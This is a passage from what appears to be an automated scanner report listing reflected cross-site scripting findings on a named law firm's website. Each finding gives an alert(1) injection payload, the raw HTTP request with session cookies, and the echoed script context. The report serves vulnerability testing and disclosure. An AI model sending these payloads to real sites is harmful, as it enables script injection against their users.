This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /legalnotices?a0792'-alert(1)-'83d5d12175f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:36 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1165; path=/
Set-Cookie: PortletId=1156501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14448


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Legal Notices</title>
<meta name="language" co
...[SNIP]...
ment.aspnetForm.action = '/legalnotices/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/legalnotices/GeneralPageData.aspx?a0792'-alert(1)-'83d5d12175f=1';//]]>
...[SNIP]...

4.84. http://www.cov.com/mclarty [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /mclarty

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 354a9'-alert(1)-'6c85014edb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mclarty?354a9'-alert(1)-'6c85014edb2=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:44:27 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1407; path=/
Set-Cookie: PortletId=4044201; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | McLarty Associates</title>
<meta name="languag
...[SNIP]...
[CDATA[
document.aspnetForm.action = '/mclarty/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/mclarty/AboutSection.aspx?354a9'-alert(1)-'6c85014edb2=1';//]]>
...[SNIP]...

4.85. http://www.cov.com/news/detail.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /news/detail.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b350e'-alert(1)-'c5433843e1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/detail.aspx?b350e'-alert(1)-'c5433843e1a=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:41:56 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1158; path=/
Set-Cookie: PortletId=1149501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10881


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP</title>
<meta name="language" content="7483b893-
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/news/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/news/detail.aspx?b350e'-alert(1)-'c5433843e1a=1';//]]>
...[SNIP]...

4.86. http://www.cov.com/news/detail.aspx [news parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /news/detail.aspx

Issue detail

The value of the news request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eb11'-alert(1)-'81ed8e1df91 was submitted in the news parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/detail.aspx?news=15409eb11'-alert(1)-'81ed8e1df91 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:40:51 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1158; path=/
Set-Cookie: PortletId=1149501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10909


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP</title>
<meta name="language" content="7483b893-
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/news/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/news/detail.aspx?news=15409eb11'-alert(1)-'81ed8e1df91';//]]>
...[SNIP]...

4.87. http://www.cov.com/newsandevents [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /newsandevents

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f75a8'-alert(1)-'99f649b592f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /newsandevents?f75a8'-alert(1)-'99f649b592f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:36:54 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1157; path=/
Set-Cookie: PortletId=1148501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 144156


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | News & Events</title>
<meta name="language" co
...[SNIP]...
ent.aspnetForm.action = '/newsandevents/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/newsandevents/NewsEventsPubs.aspx?f75a8'-alert(1)-'99f649b592f=1';//]]>
...[SNIP]...

4.88. http://www.cov.com/offices [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /offices

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c98b'-alert(1)-'fd3b25fecf2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /offices?2c98b'-alert(1)-'fd3b25fecf2=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:45:49 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1161; path=/
Set-Cookie: PortletId=1152501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78699


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Offices</title>
<meta name="language" content=
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/offices/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/offices/List.aspx?2c98b'-alert(1)-'fd3b25fecf2=1';//]]>
...[SNIP]...

4.89. http://www.cov.com/practice [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /practice

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4da1'-alert(1)-'610b8b730dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /practice?f4da1'-alert(1)-'610b8b730dc=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:36:08 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 247989


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Practices, Industries & Regions</title>
<meta
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/practice/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/practice/Services.aspx?f4da1'-alert(1)-'610b8b730dc=1';//]]>
...[SNIP]...

4.90. http://www.cov.com/practice/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /practice/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c53e5'-alert(1)-'9529b8f7a51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /practice/?c53e5'-alert(1)-'9529b8f7a51=1 HTTP/1.1
Host: www.cov.com
Proxy-Connection: keep-alive
Referer: http://www.cov.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=0; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 16:56:09 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 247989
Content-Length: 247989


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Practices, Industries & Regions</title>
<meta
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/practice/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/practice/Services.aspx?c53e5'-alert(1)-'9529b8f7a51=1';//]]>
...[SNIP]...

4.91. http://www.cov.com/privacypolicy [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /privacypolicy

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df5e0'-alert(1)-'cd34e2cebf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacypolicy?df5e0'-alert(1)-'cd34e2cebf=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:27 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1164; path=/
Set-Cookie: PortletId=1155501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13182


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Privacy Policy</title>
<meta name="language" c
...[SNIP]...
nt.aspnetForm.action = '/privacypolicy/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/privacypolicy/GeneralPageData.aspx?df5e0'-alert(1)-'cd34e2cebf=1';//]]>
...[SNIP]...

4.92. http://www.cov.com/probonooverview [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /probonooverview

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb241'-alert(1)-'14889ea6214 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /probonooverview?eb241'-alert(1)-'14889ea6214=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
